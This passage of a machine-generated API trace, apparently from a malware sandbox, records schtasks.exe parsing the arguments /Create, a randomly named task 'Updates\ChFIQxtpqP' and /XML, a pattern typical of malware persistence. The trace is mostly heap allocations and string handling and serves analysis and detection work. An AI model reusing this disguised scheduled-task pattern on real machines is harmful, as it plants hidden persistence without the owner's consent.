(lpTopLevelExceptionFilter=0x617881) returned 0x0 [0183.309] __wgetmainargs (in: _Argc=0x629e6c, _Argv=0x629e74, _Env=0x629e70, _DoWildCard=0, _StartInfo=0x629e80 | out: _Argc=0x629e6c, _Argv=0x629e74, _Env=0x629e70) returned 0 [0183.310] _onexit (_Func=0x620fe2) returned 0x620fe2 [0183.310] _onexit (_Func=0x620ff3) returned 0x620ff3 [0183.310] _onexit (_Func=0x621002) returned 0x621002 [0183.311] _onexit (_Func=0x62101e) returned 0x62101e [0183.311] _onexit (_Func=0x62103a) returned 0x62103a [0183.311] _onexit (_Func=0x621056) returned 0x621056 [0183.311] _onexit (_Func=0x621072) returned 0x621072 [0183.311] _onexit (_Func=0x62108e) returned 0x62108e [0183.311] _onexit (_Func=0x6210aa) returned 0x6210aa [0183.311] _onexit (_Func=0x6210c6) returned 0x6210c6 [0183.312] _onexit (_Func=0x6210e2) returned 0x6210e2 [0183.312] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0183.312] WinSqmIsOptedIn () returned 0x0 [0183.312] GetProcessHeap () returned 0x170000 [0183.312] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184b58 [0183.312] SetLastError (dwErrCode=0x0) [0183.313] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0183.313] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0183.313] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0183.313] VerifyVersionInfoW (in: lpVersionInformation=0x12f3d4, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x12f3d4) returned 1 [0183.313] GetProcessHeap () returned 0x170000 [0183.313] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184b70 [0183.313] lstrlenW (lpString="") returned 0 [0183.313] GetProcessHeap () returned 0x170000 [0183.313] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x2) returned 0x184f40 [0183.313] GetProcessHeap () returned 0x170000 [0183.313] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x184f50 [0183.313] GetProcessHeap () returned 0x170000 [0183.313] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184b88 [0183.313] GetProcessHeap () returned 0x170000 [0183.313] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x184f70 [0183.313] GetProcessHeap () returned 0x170000 [0183.313] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x184f90 [0183.313] GetProcessHeap () returned 0x170000 [0183.313] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x184fb0 [0183.313] GetProcessHeap () returned 0x170000 [0183.313] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x184fd0 [0183.313] GetProcessHeap () returned 0x170000 [0183.313] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184ba0 [0183.313] GetProcessHeap () returned 0x170000 [0183.313] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x184ff0 [0183.313] GetProcessHeap () returned 0x170000 [0183.313] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185010 [0183.313] GetProcessHeap () returned 0x170000 [0183.314] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185030 [0183.314] GetProcessHeap () returned 0x170000 [0183.314] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185050 [0183.314] GetProcessHeap () returned 0x170000 [0183.314] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184bb8 [0183.314] GetProcessHeap () returned 0x170000 [0183.314] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185070 [0183.314] GetProcessHeap () returned 0x170000 [0183.314] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x1850a8 [0183.314] GetProcessHeap () returned 0x170000 [0183.314] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x1850c8 [0183.314] GetProcessHeap () returned 0x170000 [0183.314] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x1850e8 [0183.314] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.315] SetLastError (dwErrCode=0x0) [0183.315] GetProcessHeap () returned 0x170000 [0183.315] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185108 [0183.315] GetProcessHeap () returned 0x170000 [0183.315] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185128 [0183.315] GetProcessHeap () returned 0x170000 [0183.315] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185148 [0183.315] GetProcessHeap () returned 0x170000 [0183.315] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185168 [0183.315] GetProcessHeap () returned 0x170000 [0183.315] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185188 [0183.315] GetProcessHeap () returned 0x170000 [0183.315] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184bd0 [0183.315] _memicmp (_Buf1=0x184bd0, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.315] GetProcessHeap () returned 0x170000 [0183.315] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x208) returned 0x185a10 [0183.315] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x185a10, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0183.315] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x74a00000 [0183.317] GetProcAddress (hModule=0x74a00000, lpProcName="GetFileVersionInfoSizeW") returned 0x74a019d9 [0183.317] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0183.318] GetProcessHeap () returned 0x170000 [0183.318] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x74e) returned 0x185c20 [0183.318] GetProcAddress (hModule=0x74a00000, lpProcName="GetFileVersionInfoW") returned 0x74a019f4 [0183.318] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x185c20 | out: lpData=0x185c20) returned 1 [0183.318] GetProcAddress (hModule=0x74a00000, lpProcName="VerQueryValueW") returned 0x74a01b51 [0183.318] VerQueryValueW (in: pBlock=0x185c20, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12f4dc, puLen=0x12f4e0 | out: lplpBuffer=0x12f4dc*=0x185fbc, puLen=0x12f4e0) returned 1 [0183.320] _memicmp (_Buf1=0x184bd0, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.320] _vsnwprintf (in: _Buffer=0x185a10, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x12f4c4 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0183.320] VerQueryValueW (in: pBlock=0x185c20, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x12f4ec, puLen=0x12f4e8 | out: lplpBuffer=0x12f4ec*=0x185de8, puLen=0x12f4e8) returned 1 [0183.320] lstrlenW (lpString="schtasks.exe") returned 12 [0183.320] lstrlenW (lpString="schtasks.exe") returned 12 [0183.320] lstrlenW (lpString=".EXE") returned 4 [0183.320] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0183.321] lstrlenW (lpString="schtasks.exe") returned 12 [0183.321] lstrlenW (lpString=".EXE") returned 4 [0183.321] _memicmp (_Buf1=0x184bd0, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.321] lstrlenW (lpString="schtasks") returned 8 [0183.321] GetProcessHeap () returned 0x170000 [0183.321] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x1851c8 [0183.321] GetProcessHeap () returned 0x170000 [0183.321] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x1851e8 [0183.321] GetProcessHeap () returned 0x170000 [0183.321] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185208 [0183.321] GetProcessHeap () returned 0x170000 [0183.321] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185228 [0183.321] GetProcessHeap () returned 0x170000 [0183.321] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184c30 [0183.321] _memicmp (_Buf1=0x184c30, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.322] GetProcessHeap () returned 0x170000 [0183.322] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0xa0) returned 0x186600 [0183.322] GetProcessHeap () returned 0x170000 [0183.322] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185248 [0183.322] GetProcessHeap () returned 0x170000 [0183.322] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185268 [0183.322] GetProcessHeap () returned 0x170000 [0183.322] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185288 [0183.322] GetProcessHeap () returned 0x170000 [0183.322] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184c48 [0183.322] _memicmp (_Buf1=0x184c48, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.322] GetProcessHeap () returned 0x170000 [0183.322] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x200) returned 0x1866a8 [0183.322] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x1866a8, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0183.322] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0183.322] GetProcessHeap () returned 0x170000 [0183.322] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x30) returned 0x1868b0 [0183.322] _vsnwprintf (in: _Buffer=0x186600, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x12f4c8 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0183.322] GetProcessHeap () returned 0x170000 [0183.322] GetProcessHeap () returned 0x170000 [0183.322] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x185c20) returned 1 [0183.322] GetProcessHeap () returned 0x170000 [0183.323] RtlSizeHeap (HeapHandle=0x170000, Flags=0x0, MemoryPointer=0x185c20) returned 0x74e [0183.323] HeapFree (in: hHeap=0x170000, dwFlags=0x0, lpMem=0x185c20 | out: hHeap=0x170000) returned 1 [0183.323] SetLastError (dwErrCode=0x0) [0183.323] GetThreadLocale () returned 0x409 [0183.323] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.323] lstrlenW (lpString="?") returned 1 [0183.323] GetThreadLocale () returned 0x409 [0183.323] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.323] lstrlenW (lpString="create") returned 6 [0183.323] GetThreadLocale () returned 0x409 [0183.323] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.323] lstrlenW (lpString="delete") returned 6 [0183.323] GetThreadLocale () returned 0x409 [0183.323] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.323] lstrlenW (lpString="query") returned 5 [0183.323] GetThreadLocale () returned 0x409 [0183.323] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.323] lstrlenW (lpString="change") returned 6 [0183.323] GetThreadLocale () returned 0x409 [0183.323] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.323] lstrlenW (lpString="run") returned 3 [0183.323] GetThreadLocale () returned 0x409 [0183.323] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.323] lstrlenW (lpString="end") returned 3 [0183.323] GetThreadLocale () returned 0x409 [0183.323] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.323] lstrlenW (lpString="showsid") returned 7 [0183.323] GetThreadLocale () returned 0x409 [0183.323] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0183.324] SetLastError (dwErrCode=0x0) [0183.324] SetLastError (dwErrCode=0x0) [0183.324] lstrlenW (lpString="/Create") returned 7 [0183.324] lstrlenW (lpString="-/") returned 2 [0183.324] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0183.324] lstrlenW (lpString="?") returned 1 [0183.324] lstrlenW (lpString="?") returned 1 [0183.324] GetProcessHeap () returned 0x170000 [0183.324] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184c60 [0183.324] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.324] GetProcessHeap () returned 0x170000 [0183.324] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0xa) returned 0x184c78 [0183.324] lstrlenW (lpString="Create") returned 6 [0183.324] GetProcessHeap () returned 0x170000 [0183.324] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x10) returned 0x184c90 [0183.324] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.324] GetProcessHeap () returned 0x170000 [0183.324] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x1852a8 [0183.324] _vsnwprintf (in: _Buffer=0x184c78, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|?|") returned 3 [0183.324] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|Create|") returned 8 [0183.324] lstrlenW (lpString="|?|") returned 3 [0183.324] lstrlenW (lpString="|Create|") returned 8 [0183.324] SetLastError (dwErrCode=0x490) [0183.324] lstrlenW (lpString="create") returned 6 [0183.324] lstrlenW (lpString="create") returned 6 [0183.324] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.324] GetProcessHeap () returned 0x170000 [0183.324] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x184c78) returned 1 [0183.325] GetProcessHeap () returned 0x170000 [0183.325] RtlReAllocateHeap (Heap=0x170000, Flags=0xc, Ptr=0x184c78, Size=0x14) returned 0x1852c8 [0183.325] lstrlenW (lpString="Create") returned 6 [0183.325] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.325] _vsnwprintf (in: _Buffer=0x1852c8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|create|") returned 8 [0183.325] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|Create|") returned 8 [0183.325] lstrlenW (lpString="|create|") returned 8 [0183.325] lstrlenW (lpString="|Create|") returned 8 [0183.325] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0183.325] SetLastError (dwErrCode=0x0) [0183.325] SetLastError (dwErrCode=0x0) [0183.325] SetLastError (dwErrCode=0x0) [0183.325] lstrlenW (lpString="/TN") returned 3 [0183.325] lstrlenW (lpString="-/") returned 2 [0183.325] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0183.325] lstrlenW (lpString="?") returned 1 [0183.325] lstrlenW (lpString="?") returned 1 [0183.325] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.325] lstrlenW (lpString="TN") returned 2 [0183.325] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.325] _vsnwprintf (in: _Buffer=0x1852c8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|?|") returned 3 [0183.325] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|TN|") returned 4 [0183.325] lstrlenW (lpString="|?|") returned 3 [0183.325] lstrlenW (lpString="|TN|") returned 4 [0183.325] SetLastError (dwErrCode=0x490) [0183.325] lstrlenW (lpString="create") returned 6 [0183.325] lstrlenW (lpString="create") returned 6 [0183.326] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.326] lstrlenW (lpString="TN") returned 2 [0183.326] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.326] _vsnwprintf (in: _Buffer=0x1852c8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|create|") returned 8 [0183.326] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|TN|") returned 4 [0183.326] lstrlenW (lpString="|create|") returned 8 [0183.326] lstrlenW (lpString="|TN|") returned 4 [0183.326] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0183.326] SetLastError (dwErrCode=0x490) [0183.326] lstrlenW (lpString="delete") returned 6 [0183.326] lstrlenW (lpString="delete") returned 6 [0183.326] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.326] lstrlenW (lpString="TN") returned 2 [0183.326] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.326] _vsnwprintf (in: _Buffer=0x1852c8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|delete|") returned 8 [0183.326] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|TN|") returned 4 [0183.326] lstrlenW (lpString="|delete|") returned 8 [0183.326] lstrlenW (lpString="|TN|") returned 4 [0183.326] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0183.326] SetLastError (dwErrCode=0x490) [0183.326] lstrlenW (lpString="query") returned 5 [0183.326] lstrlenW (lpString="query") returned 5 [0183.326] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.326] lstrlenW (lpString="TN") returned 2 [0183.326] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.327] _vsnwprintf (in: _Buffer=0x1852c8, _BufferCount=0x8, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|query|") returned 7 [0183.327] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|TN|") returned 4 [0183.327] lstrlenW (lpString="|query|") returned 7 [0183.327] lstrlenW (lpString="|TN|") returned 4 [0183.327] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0 [0183.327] SetLastError (dwErrCode=0x490) [0183.327] lstrlenW (lpString="change") returned 6 [0183.327] lstrlenW (lpString="change") returned 6 [0183.327] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.327] lstrlenW (lpString="TN") returned 2 [0183.327] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.327] _vsnwprintf (in: _Buffer=0x1852c8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|change|") returned 8 [0183.327] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|TN|") returned 4 [0183.327] lstrlenW (lpString="|change|") returned 8 [0183.327] lstrlenW (lpString="|TN|") returned 4 [0183.327] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0 [0183.327] SetLastError (dwErrCode=0x490) [0183.327] lstrlenW (lpString="run") returned 3 [0183.327] lstrlenW (lpString="run") returned 3 [0183.327] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.327] lstrlenW (lpString="TN") returned 2 [0183.327] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.327] _vsnwprintf (in: _Buffer=0x1852c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|run|") returned 5 [0183.327] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|TN|") returned 4 [0183.327] lstrlenW (lpString="|run|") returned 5 [0183.327] lstrlenW (lpString="|TN|") returned 4 [0183.328] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0 [0183.328] SetLastError (dwErrCode=0x490) [0183.328] lstrlenW (lpString="end") returned 3 [0183.328] lstrlenW (lpString="end") returned 3 [0183.328] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.328] lstrlenW (lpString="TN") returned 2 [0183.328] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.328] _vsnwprintf (in: _Buffer=0x1852c8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|end|") returned 5 [0183.328] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|TN|") returned 4 [0183.328] lstrlenW (lpString="|end|") returned 5 [0183.328] lstrlenW (lpString="|TN|") returned 4 [0183.328] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0 [0183.328] SetLastError (dwErrCode=0x490) [0183.328] lstrlenW (lpString="showsid") returned 7 [0183.328] lstrlenW (lpString="showsid") returned 7 [0183.328] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.328] GetProcessHeap () returned 0x170000 [0183.328] HeapValidate (hHeap=0x170000, dwFlags=0x0, lpMem=0x1852c8) returned 1 [0183.328] GetProcessHeap () returned 0x170000 [0183.328] RtlReAllocateHeap (Heap=0x170000, Flags=0xc, Ptr=0x1852c8, Size=0x16) returned 0x1852e8 [0183.328] lstrlenW (lpString="TN") returned 2 [0183.328] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.328] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0xa, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|showsid|") returned 9 [0183.328] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|TN|") returned 4 [0183.328] lstrlenW (lpString="|showsid|") returned 9 [0183.328] lstrlenW (lpString="|TN|") returned 4 [0183.328] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0 [0183.329] SetLastError (dwErrCode=0x490) [0183.329] SetLastError (dwErrCode=0x490) [0183.329] SetLastError (dwErrCode=0x0) [0183.329] lstrlenW (lpString="/TN") returned 3 [0183.329] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0 [0183.329] SetLastError (dwErrCode=0x490) [0183.329] SetLastError (dwErrCode=0x0) [0183.329] lstrlenW (lpString="/TN") returned 3 [0183.329] GetProcessHeap () returned 0x170000 [0183.329] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x8) returned 0x1868e8 [0183.329] GetProcessHeap () returned 0x170000 [0183.329] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x1852c8 [0183.329] SetLastError (dwErrCode=0x0) [0183.329] SetLastError (dwErrCode=0x0) [0183.329] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0183.329] lstrlenW (lpString="-/") returned 2 [0183.329] StrChrIW (lpStart="-/", wMatch=0x55) returned 0x0 [0183.329] SetLastError (dwErrCode=0x490) [0183.329] SetLastError (dwErrCode=0x490) [0183.329] SetLastError (dwErrCode=0x0) [0183.329] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0183.329] StrChrIW (lpStart="Updates\\ChFIQxtpqP", wMatch=0x3a) returned 0x0 [0183.329] SetLastError (dwErrCode=0x490) [0183.329] SetLastError (dwErrCode=0x0) [0183.329] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0183.329] GetProcessHeap () returned 0x170000 [0183.329] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x26) returned 0x1868f8 [0183.329] GetProcessHeap () returned 0x170000 [0183.329] RtlAllocateHeap (HeapHandle=0x170000, Flags=0xc, Size=0x14) returned 0x185308 [0183.329] SetLastError (dwErrCode=0x0) [0183.329] SetLastError (dwErrCode=0x0) [0183.329] lstrlenW (lpString="/XML") returned 4 [0183.330] lstrlenW (lpString="-/") returned 2 [0183.330] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0183.330] lstrlenW (lpString="?") returned 1 [0183.330] lstrlenW (lpString="?") returned 1 [0183.330] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.330] lstrlenW (lpString="XML") returned 3 [0183.330] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.330] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|?|") returned 3 [0183.330] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|XML|") returned 5 [0183.330] lstrlenW (lpString="|?|") returned 3 [0183.330] lstrlenW (lpString="|XML|") returned 5 [0183.330] SetLastError (dwErrCode=0x490) [0183.330] lstrlenW (lpString="create") returned 6 [0183.330] lstrlenW (lpString="create") returned 6 [0183.330] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.330] lstrlenW (lpString="XML") returned 3 [0183.330] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.330] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|create|") returned 8 [0183.330] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|XML|") returned 5 [0183.330] lstrlenW (lpString="|create|") returned 8 [0183.330] lstrlenW (lpString="|XML|") returned 5 [0183.330] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0 [0183.330] SetLastError (dwErrCode=0x490) [0183.330] lstrlenW (lpString="delete") returned 6 [0183.330] lstrlenW (lpString="delete") returned 6 [0183.330] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.331] lstrlenW (lpString="XML") returned 3 [0183.331] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.331] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|delete|") returned 8 [0183.331] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|XML|") returned 5 [0183.331] lstrlenW (lpString="|delete|") returned 8 [0183.331] lstrlenW (lpString="|XML|") returned 5 [0183.331] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0 [0183.331] SetLastError (dwErrCode=0x490) [0183.331] lstrlenW (lpString="query") returned 5 [0183.331] lstrlenW (lpString="query") returned 5 [0183.331] _memicmp (_Buf1=0x184c60, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.331] lstrlenW (lpString="XML") returned 3 [0183.331] _memicmp (_Buf1=0x184c90, _Buf2=0x601ed8, _Size=0x7) returned 0 [0183.331] _vsnwprintf (in: _Buffer=0x1852e8, _BufferCount=0x8, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|query|") returned 7 [0183.331] _vsnwprintf (in: _Buffer=0x1852a8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x12f4b0 | out: _Buffer="|XML|") returned 5 [0183.331] lstrlenW (lpString="|query|") returned 7 [0183.331] lstrlenW (lpString="|XML|") returned 5 [0183.331] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0 [0183.331] 